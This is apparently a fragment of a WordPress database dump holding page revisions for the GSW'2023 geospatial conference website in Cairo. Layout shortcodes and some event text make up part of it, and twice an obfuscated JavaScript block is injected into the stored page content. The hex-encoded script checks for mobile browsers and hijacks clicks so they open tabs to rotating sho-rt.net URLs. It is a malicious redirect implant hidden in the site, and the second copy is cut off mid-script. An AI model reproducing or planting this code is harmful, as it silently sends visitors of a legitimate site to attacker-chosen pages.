-webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:54:21','2022-11-09 15:54:21','',3066,'https://gsw2023.com/?p=3151',0,'revision','',0),
(3152,1,'2022-11-09 16:11:53','2022-11-09 16:11:53','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 